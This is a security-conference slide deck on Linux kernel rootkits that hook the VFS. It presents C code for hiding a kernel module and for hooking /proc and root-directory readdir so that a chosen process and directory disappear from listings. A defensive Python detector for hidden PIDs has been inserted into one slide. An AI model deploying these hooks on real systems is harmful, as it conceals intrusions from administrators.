Linux rootkits without syscall patching,
(the VFS way)
Confraria SECURITY & IT – 28 Set 2011
#> whoami
§  Ricardo Mourato – 25 yo
§  Computer Science Degree
§  InfoSec & SuperBock Stout addicted
§  OS X, Slackware, FreeBSD, OpenBSD, Solaris fanatic
§  Java, .Net, Python, Ruby, C, C++, ASM Lover
§  Windows (All versions), Perl (All versions) and Printers (Yes,
    they came from hell!) hater
§  root, right here :)




                                                                      2
Agenda
§  Linux rootkits – brief talk
§  Linux 2.{5,6} kernel – what changed?
§  The Virtual Filesystem (VFS)
§  Meet /proc, our friend!
§  Introducing
§  Show time :)
§  Retrospect
§  Questions & Answers




                                            3
Linux rootkits – how they were?
§  In the beginning…
   §  User-land Trojaned binaries mostly
         §  Easy to spot
         §  Easy to code
         §  However, hard to hide!


   §  LRK5 was a good bastard…




                                            4
Linux rootkits – how they were?
§  Not so far away…
   §  The Kernel-land approach
         §    Loadable Kernel Modules or /dev/kmem “patching”
         §    Syscall patching
         §    Easy to code
         §    Less easy to find


   Adore & suckit were also good bastards!




                                                                 5
Linux rootkits – how they were?

  extern void *sys_call_table[];

  int init_module(void) {
       original_call = sys_call_table[__NR_open];
       sys_call_table[__NR_open] = evil_open;
       return 0;
  }




                                                    6
Linux 2.{5,6} – what changed?

§  Main change:
   §    OMG! sys_call_table[] no longer exported!!!
          §  Even if you find it, it will be read-only

§  Workaround:
   §    Find IDT
   §    Find the 0x80 interrupt
   §    Get the system_call() function location
   §    Use gdb kung fu and search memory for sys_call_table[] within
         this function


                                                                         7
Linux 2.{5,6} – what changed?


  $ gdb -q /usr/src/linux/vmlinux
  (no debugging symbols found)...(gdb) disass system_call
  …
  0xc0106bf4 : call *0xc01e0f18(,%eax,4)
  …
  (gdb) print &sys_call_table
   $1 = ( *) 0xc01e0f18




                                                            8
The Virtual Filesystem

§  Is the primary interface to underlying filesystems (common file model)
§  Exports a set of interfaces for every individual filesystem
§  Each filesystem must “implement” this interface in order to become a
    common file model
§  Some interesting players are:
    §  struct dentry;
    §  struct file_operations;
    §  struct inode_operations;




                                                                        9
/proc is our friend

§  So… everything in Linux “is a file”, right?
    §  Including the ones located at /proc, even if they live only “in memory”

§  And… most user-land tools rely on /proc to get their information!
    §  These tools include:
           §    ps
           §    netstat
           §    top
           §    mount
           §    And many, many others…

§  Remember struct file_operations? :)


                                                                  10
Introducing Fuckit…

§  Fu Control Kit (just in case!)
§  A research-born VFS rootkit capable of:
    §    Hide itself       <- No sh*t, Sherlock?
    §    Hide processes
    §    Hide files and directories
    §    TTY sniffing




                                                   11
Module hiding

§  Modules are linked together in a doubly linked list maintained by the
    kernel
§  The kernel has internal functions to “unlink” unloaded modules
    from that list
§  Just use them wisely :)




                                                                          12
Module hiding

       static struct module *m = THIS_MODULE;

       void hideme(void){
                kobject_del(&m->mkobj.kobj);
                list_del(&m->list);
       }




                                                13
“Hook” the Virtual Filesystem (/proc)

   static struct file_operations *proc_fops; /* <- remember again? :) */

   void hook_proc(void){
           /* we are not /proc yet */
           key = create_proc_entry(KEY,0666,NULL);
           /* now we become /proc :) */
           proc = key->parent;
           /* save the original, we will need it later */
           proc_fops = (struct file_operations *)proc->proc_fops;

           original_proc_readdir = proc_fops->readdir;
           /* the hook */
           proc_fops->readdir = fuckit_proc_readdir;
   }


                                                                     14
“Hook” the Virtual Filesystem (/)

   static struct file *f;

   int hook_root(void){

           f = filp_open("/",O_RDONLY,0600);
           if(IS_ERR(f)){
                   return -1;
           }
           original_root_readdir = f->f_op->readdir;
           f->f_op->readdir=fuckit_root_readdir;
           filp_close(f,NULL);

           return 0;
   }


                                                           15
Process hiding

   static inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen,
                                         loff_t offset, u64 ino, unsigned d_type){
           //our hidden PID :)
           if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){
                   return 0;
           }
           return original_filldir(__buf,name,namelen,offset,ino,d_type);
   }


   static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){
           //save this, we will need to return it later
           original_filldir = filldir;
           return original_proc_readdir(filp,dirent,fuckit_proc_filldir);
   }


                                                                                              16
File and Directory hiding

   static int fuckit_root_filldir(void *__buf, const char *name, int namelen,
                                  loff_t offset, u64 ino, unsigned d_type){
           //if it is our hidden file/directory return nothing! :)
           if(strncmp(name,HIDDEN_DIR,namelen)==0){
                   return 0;
           }
           return original_root_filldir(__buf,name,namelen,offset,ino,d_type);
   }

   static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){
           //save this, we will need to return it later
           original_root_filldir = filldir;
           return original_root_readdir(filp,dirent,fuckit_root_filldir);
   }



                                                                                              17
Seeing is believing




                      18
Retrospect

§  Syscall patching in the 2.6 kernel is a true “pain in the a**”
§  VFS hooks also do the job!
§  It is a good approach; however, it has some cons
    §  It is possible to “brute force” /proc for hidden PIDs
           §  You should let the Linux scheduler do this job!


§  Hypervisor rootkits will kill -9 every kernel rootkit on earth! :)
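The “brute force /proc” check named above, combined with the point from the “/proc is our friend” slide that ps, top and friends trust what readdir() on /proc returns, as an added example in Python that is not part of the talk or of the Fuckit code. It takes the listing the way those tools do (readdir), then asks for every /proc/<pid> by name up to pid_max, which goes through directory lookup rather than the hooked readdir, and reports PIDs found only the second way. The function names and the Tgid filter are my choices; the data in demo() is constructed, not captured from a real system.

```python
"""Cross-check the /proc listing against a direct per-PID probe (added example)."""
import os
import re
from typing import Callable, Iterable, Optional, Set

PID_RE = re.compile(r"^\d+$")
DEFAULT_PID_MAX = 32768  # fallback if /proc/sys/kernel/pid_max cannot be read


def listed_pids(entries: Iterable[str]) -> Set[int]:
    """PIDs as a readdir()-based tool such as ps or top sees them."""
    return {int(e) for e in entries if PID_RE.match(e)}


def probed_pids(pid_max: int, exists: Callable[[int], bool]) -> Set[int]:
    """PIDs found by asking for each /proc/<pid> by name, bypassing readdir()."""
    return {pid for pid in range(1, pid_max + 1) if exists(pid)}


def parse_tgid(status_text: str) -> Optional[int]:
    """Extract the Tgid field from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("Tgid:"):
            return int(line.split()[1])
    return None


def suspicious_pids(listed_entries: Iterable[str], pid_max: int,
                    exists: Callable[[int], bool],
                    tgid_of: Callable[[int], Optional[int]]) -> Set[int]:
    """PIDs reachable by direct lookup but absent from the directory listing.

    Non-leader threads are filtered out: /proc/<tid> resolves by lookup yet is
    never listed by readdir(), so without the Tgid check every multithreaded
    process on the box would show up as a false positive.
    """
    listed = listed_pids(listed_entries)
    candidates = probed_pids(pid_max, exists) - listed
    return {pid for pid in candidates if tgid_of(pid) == pid}


def demo() -> Set[int]:
    """Constructed sample (not from a real system): PID 4242 is reachable by
    lookup but missing from the listing; 4243 is one of its threads."""
    listing = ["1", "2", "1337", "self", "cpuinfo"]   # what readdir() returned
    present = {1, 2, 1337, 4242, 4243}                 # what direct lookup finds
    tgids = {4243: 4242}                               # thread 4243 belongs to 4242
    return suspicious_pids(listing, 5000, present.__contains__,
                           lambda pid: tgids.get(pid, pid))


# ---- live helpers (Linux only) --------------------------------------------

def read_pid_max(path: str = "/proc/sys/kernel/pid_max") -> int:
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return DEFAULT_PID_MAX


def proc_pid_exists(pid: int) -> bool:
    """Direct lookup of /proc/<pid>; succeeds even if readdir() omits the entry."""
    try:
        os.stat(f"/proc/{pid}")
        return True
    except OSError:
        return False


def proc_tgid(pid: int) -> Optional[int]:
    try:
        with open(f"/proc/{pid}/status") as fh:
            return parse_tgid(fh.read())
    except OSError:
        return None  # process exited between the two passes


def scan_live(rounds: int = 2) -> Set[int]:
    """Repeat the check and keep only PIDs flagged in every round, which drops
    processes that were merely created between the listing and the probe."""
    result: Optional[Set[int]] = None
    for _ in range(rounds):
        found = suspicious_pids(os.listdir("/proc"), read_pid_max(),
                                proc_pid_exists, proc_tgid)
        result = found if result is None else result & found
    return result or set()


if __name__ == "__main__":
    print("demo (constructed data):", sorted(demo()))
    if os.path.isdir("/proc"):
        hidden = scan_live()
        print("live scan, suspicious PIDs:", sorted(hidden) if hidden else "none")
```

A hit from the live scan is a PID whose /proc directory answers to stat() but which readdir() never returned, exactly the inconsistency a readdir hook such as the one on the previous slides creates. Running as root avoids permission noise when reading /proc/<pid>/status; a rootkit that also filters lookup(), or the scheduler-based approach the bullet above refers to, is outside what this check can see.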




                                                                         19
References

§  IBM developerWorks “Anatomy of the Linux filesystem”. Internet:
    http://www.ibm.com/developerworks/linux/library/l-linux-filesystem/.
    [Jan 25, 2011]
§  WangYao “Rootkit on Linux x86 v2.6” [Apr 21, 2009]
§  Dump “hideme (ng)”. Internet: http://trace.dump.cz/projects.php [Jan
    25, 2011]
§  Ubra “Process Hiding & The Linux scheduler”. Internet:
    http://www.phrack.org/issues.html?issue=63&id=18 [Jan 25, 2011]




                                                                           20
21
Questions & Answers



                ?

                      22
